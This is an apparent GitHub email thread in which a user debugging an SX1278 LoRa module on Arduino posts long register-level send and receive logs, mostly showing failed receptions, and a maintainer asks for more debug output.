72\n> ## Reading:  ## Register 26:  C\n> ## Writing:  ## Register 1D:  92\n> ## Writing:  ## Register 26:  C\n> ## Reading:  ## Register 1D:  92\n> ## Reading:  ## Register 26:  C\n>\n> Starting 'isBW'\n> ## Bandwidth 9 has been successfully set ##\n>\n> ## Writing:  ## Register 1:  81\n> ## Reading:  ## Register 1D:  92\n> ## Reading:  ## Register 1E:  C3\n> ## Mode 4 configured with success ##\n> ## Writing:  ## Register 1:  81\n> Setting Mode: SUCCESS\n>\n> Starting 'setHeaderON'\n> ## Reading:  ## Register 1D:  92\n> ## Writing:  ## Register 1D:  92\n> ## Reading:  ## Register 1D:  92\n> ## Header has been activated ##\n>\n> Setting Header ON: SUCCESS\n>\n> Starting 'setChannel'\n> ## Reading:  ## Register 1:  81\n> ## Writing:  ## Register 1:  81\n> ## Writing:  ## Register 6:  6C\n> ## Writing:  ## Register 7:  72\n> ## Writing:  ## Register 8:  4F\n> ## Reading:  ## Register 6:  6C\n> ## Reading:  ## Register 7:  72\n> ## Reading:  ## Register 8:  4F\n> ## Frequency channel 6C724F has been successfully set ##\n>\n>\n> Starting 'isChannel'\n> ## Writing:  ## Register 1:  81\n> Setting Channel: SUCCESS\n>\n> Starting 'setCRC_ON'\n> ## Reading:  ## Register 1E:  C3\n> ## Writing:  ## Register 1E:  C7\n> ## Reading:  ## Register 1E:  C7\n> ## CRC has been activated ##\n>\n> Setting CRC ON: SUCCESS\n>\n> Starting 'setPower'\n> ## Reading:  ## Register 1:  81\n> ## Writing:  ## Register 1:  81\n> ## Writing:  ## Register 4D:  84\n> ## Writing:  ## Register 4D:  87\n> ## Writing:  ## Register 9:  FF\n> ## Reading:  ## Register 9:  FF\n> ## Output power has been successfully set ##\n>\n> ## Writing:  ## Register 1:  81\n> Setting Power: SUCCESS\n>\n> Starting 'setNodeAddress'\n> ## Reading:  ## Register 1:  81\n> Setting node address: SUCCESS\n> sx1278 configured finished\n>\n>\n> Starting 'sendPacketTimeout'\n>\n> Starting 'setPacket'\n> ## Reading:  ## Register 1:  81\n> ## Reading:  ## Register 1:  81\n> ## Writing:  ## Register 1:  81\n> ## Writing:  ## Register 12:  FF\n> ## Writing:  ## Register 1:  81\n> ## LoRa flags cleared ##\n>\n> Starting 'setDestination'\n> ## Destination 4 successfully set ##\n> ## Source 2 successfully set ##\n> ## Packet number 0 successfully set ##\n>\n>\n> Starting 'setPayload'\n>\n> Starting 'truncPayload'\n>\n> Starting 'setPacketLength'\n> ## Reading:  ## Register 1:  81\n> ## Writing:  ## Register 1:  81\n> ## Writing:  ## Register 22:  4B\n> ## Reading:  ## Register 22:  4B\n> ## Packet length 75 has been successfully set ##\n>\n> ## Writing:  ## Register 1:  81\n> ## Writing:  ## Register E:  0\n> ## Writing:  ## Register D:  0\n> ## Writing:  ## Register 0:  4\n> ## Writing:  ## Register 0:  2\n> ## Writing:  ## Register 0:  0\n> ## Writing:  ## Register 0:  4B\n> ## Writing:  ## Register 0:  50\n> ## Writing:  ## Register 0:  61\n> ## Writing:  ## Register 0:  63\n> ## Writing:  ## Register 0:  6B\n> ## Writing:  ## Register 0:  65\n> ## Writing:  ## Register 0:  74\n> ## Writing:  ## Register 0:  20\n> ## Writing:  ## Register 0:  31\n> ## Writing:  ## Register 0:  2C\n> ## Writing:  ## Register 0:  20\n> ## Writing:  ## Register 0:  77\n> ## Writing:  ## Register 0:  61\n> ## Writing:  ## Register 0:  6E\n> ## Writing:  ## Register 0:  74\n> ## Writing:  ## Register 0:  69\n> ## Writing:  ## Register 0:  6E\n> ## Writing:  ## Register 0:  67\n> ## Writing:  ## Register 0:  20\n> ## Writing:  ## Register 0:  74\n> ## Writing:  ## Register 0:  6F\n> ## Writing:  ## Register 0:  20\n> ## Writing:  ## Register 0:  73\n> ## Writing:  ## Register 0:  65\n> ## Writing:  ## Register 0:  65\n> ## Writing:  ## Register 0:  20\n> ## Writing:  ## Register 0:  69\n> ## Writing:  ## Register 0:  66\n> ## Writing:  ## Register 0:  20\n> ## Writing:  ## Register 0:  72\n> ## Writing:  ## Register 0:  65\n> ## Writing:  ## Register 0:  63\n> ## Writing:  ## Register 0:  65\n> ## Writing:  ## Register 0:  69\n> ## Writing:  ## Register 0:  76\n> ## Writing:  ## Register 0:  65\n> ## Writing:  ## Register 0:  64\n> ## Writing:  ## Register 0:  20\n> ## Writing:  ## Register 0:  70\n> ## Writing:  ## Register 0:  61\n> ## Writing:  ## Register 0:  63\n> ## Writing:  ## Register 0:  6B\n> ## Writing:  ## Register 0:  65\n> ## Writing:  ## Register 0:  74\n> ## Writing:  ## Register 0:  20\n> ## Writing:  ## Register 0:  69\n> ## Writing:  ## Register 0:  73\n> ## Writing:  ## Register 0:  20\n> ## Writing:  ## Register 0:  74\n> ## Writing:  ## Register 0:  68\n> ## Writing:  ## Register 0:  65\n> ## Writing:  ## Register 0:  20\n> ## Writing:  ## Register 0:  73\n> ## Writing:  ## Register 0:  61\n> ## Writing:  ## Register 0:  6D\n> ## Writing:  ## Register 0:  65\n> ## Writing:  ## Register 0:  20\n> ## Writing:  ## Register 0:  61\n> ## Writing:  ## Register 0:  73\n> ## Writing:  ## Register 0:  20\n> ## Writing:  ## Register 0:  73\n> ## Writing:  ## Register 0:  65\n> ## Writing:  ## Register 0:  6E\n> ## Writing:  ## Register 0:  74\n> ## Writing:  ## Register 0:  20\n> ## Writing:  ## Register 0:  70\n> ## Writing:  ## Register 0:  61\n> ## Writing:  ## Register 0:  63\n> ## Writing:  ## Register 0:  6B\n> ## Writing:  ## Register 0:  65\n> ## Writing:  ## Register 0:  74\n> ## Writing:  ## Register 0:  0\n> ## Packet set and written in FIFO ##\n> ## Packet to send: 4|2|0|4B|50|61|63|6B|65|74|20|\n> 31|2C|20|77|61|6E|74|69|6E|67|20|74|6F|20|73|65|65|20|69|66|\n> 20|72|65|63|65|69|76|65|64|20|70|61|63|6B|65|74|20|69|73|20|\n> 74|68|65|20|73|61|6D|65|20|61|73|20|73|65|6E|74|20|70|61|63|6B|65|74|0 ##\n> ## Writing:  ## Register 1:  81\n>\n> Starting 'setTimeout'\n> Timeout to send/receive is: 1780\n>\n> Starting 'sendWithTimeout'\n> ## Reading:  ## Register 1:  81\n> ## Writing:  ## Register 1:  81\n> ## Writing:  ## Register 12:  FF\n> ## Writing:  ## Register 1:  81\n> ## LoRa flags cleared ##\n> ## Writing:  ## Register 1:  83\n> ## Reading:  ## Register 12:  FF\n> ## Packet successfully sent ##\n>\n> ## Reading:  ## Register 1:  FF\n> ## Writing:  ## Register 1:  81\n> ## Writing:  ## Register 12:  FF\n> ## Writing:  ## Register 1:  FF\n> ## LoRa flags cleared ##\n> Packet sent, state 0\n>\n> Starting 'sendPacketTimeout'\n>\n> Starting 'setPacket'\n> ## Reading:  ## Register 1:  81\n> ## Reading:  ## Register 1:  81\n> ## Writing:  ## Register 1:  81\n> ## Writing:  ## Register 12:  FF\n> ## Writing:  ## Register 1:  81\n> ## LoRa flags cleared ##\n>\n> Starting 'setDestination'\n> ## Destination 0 successfully set ##\n> ## Source 2 successfully set ##\n> ## Packet number 1 successfully set ##\n>\n> In the next e-mail, I will send you the Receiving log so it do not looks\n> that messy.\n>\n> Thank you for your help.\n>\n> Regards,\n> Shen\n>\n> On Mon, Sep 5, 2016 at 6:10 PM, Wireless Open Source <\n> notifications@github.com> wrote:\n>\n>> Hi! I can't resolve your problem if you only have this info, you can\n>> change the SX1278_debug_mode variable to 2 in SX1278.h, so we can see the\n>> log.\n>>\n>> Regards,\n>> Pedro\n>>\n>> —\n>> You are receiving this because you are subscribed to this thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/wirelessopensource/lora_shield_arduino/commit/fc4892b973913a326c5c68cfbc18c407c0c7d352#commitcomment-18898333>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AR3U6tW8pMuA-rp9q6Duycf34p84g6Lqks5qm-qZgaJpZM4J0Uj3>\n>> .\n>>\n>\n>\n\nsx1278 module and Arduino: receiving packets\r\n\r\nStarting 'ON'\r\n\r\nStarting 'setMaxCurrent'\r\n## Reading:  ##\tRegister 1:  9\r\n## Writing:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister B:  3B\r\n## Writing:  ##\tRegister 1:  9\r\n## Setting ON with maximum current supply ##\r\n\r\n\r\nStarting 'setLORA'\r\n## Writing:  ##\tRegister 1:  0\r\n## Writing:  ##\tRegister 1:  80\r\n## Writing:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 23:  FF\r\n## Writing:  ##\tRegister 1D:  72\r\n## Writing:  ##\tRegister 1E:  70\r\n## Writing:  ##\tRegister 26:  0\r\n## Reading:  ##\tRegister 1:  81\r\n## LoRa set with success ##\r\n\r\nSetting power ON: SUCCESS \r\n\r\nStarting 'setMode'\r\n## Reading:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 1:  81\r\n\r\nStarting 'setCR'\r\n## Reading:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 1:  81\r\n## Reading:  ##\tRegister 1D:  72\r\n## Writing:  ##\tRegister 1D:  72\r\n## Reading:  ##\tRegister 1D:  72\r\n\r\nStarting 'isCR'\r\n## Coding Rate 1 has been successfully set ##\r\n\r\n## Writing:  ##\tRegister 1:  81\r\n\r\nStarting 'setSF'\r\n## Reading:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 1:  81\r\n## Reading:  ##\tRegister 1E:  70\r\n## Reading:  ##\tRegister 26:  0\r\n\r\nStarting 'getBW'\r\n## Reading:  ##\tRegister 1D:  72\r\n\r\nStarting 'isBW'\r\n## Bandwidth is 7 ##\r\n\r\n## Writing:  ##\tRegister 31:  3\r\n## Writing:  ##\tRegister 37:  A\r\n## Writing:  ##\tRegister 1E:  C3\r\n## Writing:  ##\tRegister 26:  C\r\n## Reading:  ##\tRegister 1E:  C3\r\n## Reading:  ##\tRegister 26:  C\r\n\r\nStarting 'getBW'\r\n## Reading:  ##\tRegister 1D:  72\r\n\r\nStarting 'isBW'\r\n## Bandwidth is 7 ##\r\n\r\n## Writing:  ##\tRegister 1:  81\r\n\r\nStarting 'isSF'\r\n## Spreading factor 12 has been successfully set ##\r\n\r\n\r\nStarting 'setBW'\r\n## Reading:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 1:  81\r\n## Reading:  ##\tRegister 1D:  72\r\n## Reading:  ##\tRegister 26:  C\r\n## Writing:  ##\tRegister 1D:  92\r\n## Writing:  ##\tRegister 26:  C\r\n## Reading:  ##\tRegister 1D:  92\r\n## Reading:  ##\tRegister 26:  C\r\n\r\nStarting 'isBW'\r\n## Bandwidth 9 has been successfully set ##\r\n\r\n## Writing:  ##\tRegister 1:  81\r\n## Reading:  ##\tRegister 1D:  92\r\n## Reading:  ##\tRegister 1E:  C3\r\n## Mode 4 configured with success ##\r\n## Writing:  ##\tRegister 1:  81\r\nSetting Mode: SUCCESS \r\n4\r\nStarting 'setHeaderON'\r\n## Reading:  ##\tRegister 1D:  92\r\n## Writing:  ##\tRegister 1D:  92\r\n## Reading:  ##\tRegister 1D:  92\r\n## Header has been activated ##\r\n\r\nSetting Header ON: SUCCESS \r\n\r\nStarting 'setChannel'\r\n## Reading:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 6:  6C\r\n## Writing:  ##\tRegister 7:  72\r\n## Writing:  ##\tRegister 8:  4F\r\n## Reading:  ##\tRegister 6:  6C\r\n## Reading:  ##\tRegister 7:  72\r\n## Reading:  ##\tRegister 8:  4F\r\n## Frequency channel 6C724F has been successfully set ##\r\n\r\n\r\nStarting 'isChannel'\r\n## Writing:  ##\tRegister 1:  81\r\nSetting Channel: SUCCESS \r\n7107151\r\nStarting 'setCRC_ON'\r\n## Reading:  ##\tRegister 1E:  C3\r\n## Writing:  ##\tRegister 1E:  C7\r\n## Reading:  ##\tRegister 1E:  C7\r\n## CRC has been activated ##\r\n\r\nSetting CRC ON: SUCCESS \r\n\r\nStarting 'setPower'\r\n## Reading:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 4D:  84\r\n## Writing:  ##\tRegister 4D:  87\r\n## Writing:  ##\tRegister 9:  FF\r\n## Reading:  ##\tRegister 9:  FF\r\n## Output power has been successfully set ##\r\n\r\n## Writing:  ##\tRegister 1:  81\r\nSetting Power: SUCCESS \r\n\r\nStarting 'setNodeAddress'\r\n## Reading:  ##\tRegister 1:  81\r\nSetting node address: SUCCESS \r\n4sx1278 configured finished\r\n\r\n\r\nStarting 'receivePacketTimeout'\r\n\r\nStarting 'receive'\r\n## Writing:  ##\tRegister 31:  43\r\n## Writing:  ##\tRegister A:  9\r\n## Writing:  ##\tRegister C:  23\r\n## Writing:  ##\tRegister D:  0\r\n## Writing:  ##\tRegister 1F:  FF\r\n## Writing:  ##\tRegister 25:  0\r\n\r\nStarting 'setPacketLength'\r\n## Reading:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 22:  FF\r\n## Reading:  ##\tRegister 22:  FF\r\n## Packet length 255 has been successfully set ##\r\n\r\n## Writing:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 1:  85\r\n## Receiving LoRa mode activated with success ##\r\n4149\r\n\r\nStarting 'availableData'\r\n## Reading:  ##\tRegister 12:  30\r\n## Valid Header received in LoRa mode ##\r\n## Reading:  ##\tRegister 25:  0\r\n## Reading:  ##\tRegister 25:  0\r\n## Reading:  ##\tRegister 25:  0\r\n## Reading:  ##\tRegister 25:  0\r\n## Reading:  ##\tRegister 25:  0\r\n## Reading:  ##\tRegister 25:  0\r\n## Reading:  ##\tRegister 25:  0\r\n## Reading:  ##\tRegister 25:  0\r\n## Reading:  ##\tRegister 25:  0\r\n## Reading:  ##\tRegister 25:  0\r\n## Reading:  ##\tRegister 25:  0\r\n## Reading:  ##\tRegister 25:  0\r\n## Reading:  ##\tRegister 25:  0\r\n## Reading:  ##\tRegister 25:  0\r\n## Reading:  ##\tRegister 25:  0\r\n## Reading:  ##\tRegister 25:  10\r\n## Reading:  ##\tRegister 0:  4\r\n## Checking destination ##\r\n## Packet received is for me ##\r\n\r\nStarting 'getPacket'\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\n## Reading:  ##\tRegister 12:  4\r\nNOT 'RxDone' flag\r\n## Writing:  ##\tRegister D:  0\r\n## Reading:  ##\tRegister 1:  85\r\n## Writing:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 12:  FF\r\n## Writing:  ##\tRegister 1:  85\r\n## LoRa flags cleared ##\r\nPackage received ERROR\r\n\r\nStarting 'receivePacketTimeout'\r\n\r\nStarting 'receive'\r\n## Writing:  ##\tRegister 31:  43\r\n## Writing:  ##\tRegister A:  9\r\n## Writing:  ##\tRegister C:  23\r\n## Writing:  ##\tRegister D:  0\r\n## Writing:  ##\tRegister 1F:  FF\r\n## Writing:  ##\tRegister 25:  0\r\n\r\nStarting 'setPacketLength'\r\n## Reading:  ##\tRegister 1:  85\r\n## Writing:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 22:  FF\r\n## Reading:  ##\tRegister 22:  4\r\n## Writing:  ##\tRegister 1:  85\r\n## Writing:  ##\tRegister 1:  85\r\n## Receiving LoRa mode activated with success ##\r\n16187\r\nPackage received ERROR\r\n\r\nStarting 'receivePacketTimeout'\r\n\r\nStarting 'receive'\r\n## Writing:  ##\tRegister 31:  43\r\n## Writing:  ##\tRegister A:  9\r\n## Writing:  ##\tRegister C:  23\r\n## Writing:  ##\tRegister D:  0\r\n## Writing:  ##\tRegister 1F:  FF\r\n## Writing:  ##\tRegister 25:  0\r\n\r\nStarting 'setPacketLength'\r\n## Reading:  ##\tRegister 1:  85\r\n## Writing:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 22:  FF\r\n## Reading:  ##\tRegister 22:  4\r\n## Writing:  ##\tRegister 1:  85\r\n## Writing:  ##\tRegister 1:  85\r\n## Receiving LoRa mode activated with success ##\r\n17206\r\nPackage received ERROR\r\n\r\nStarting 'receivePacketTimeout'\r\n\r\nStarting 'receive'\r\n## Writing:  ##\tRegister 31:  43\r\n## Writing:  ##\tRegister A:  9\r\n## Writing:  ##\tRegister C:  23\r\n## Writing:  ##\tRegister D:  0\r\n## Writing:  ##\tRegister 1F:  FF\r\n## Writing:  ##\tRegister 25:  0\r\n\r\nStarting 'setPacketLength'\r\n## Reading:  ##\tRegister 1:  85\r\n## Writing:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 22:  FF\r\n## Reading:  ##\tRegister 22:  4\r\n## Writing:  ##\tRegister 1:  85\r\n## Writing:  ##\tRegister 1:  85\r\n## Receiving LoRa mode activated with success ##\r\n18225\r\nPackage received ERROR\nsx1278 module and Arduino: send two packets (One to an addrees and another one in broadcast)\r\n\r\nStarting 'ON'\r\n\r\nStarting 'setMaxCurrent'\r\n## Reading:  ##\tRegister 1:  9\r\n## Writing:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister B:  3B\r\n## 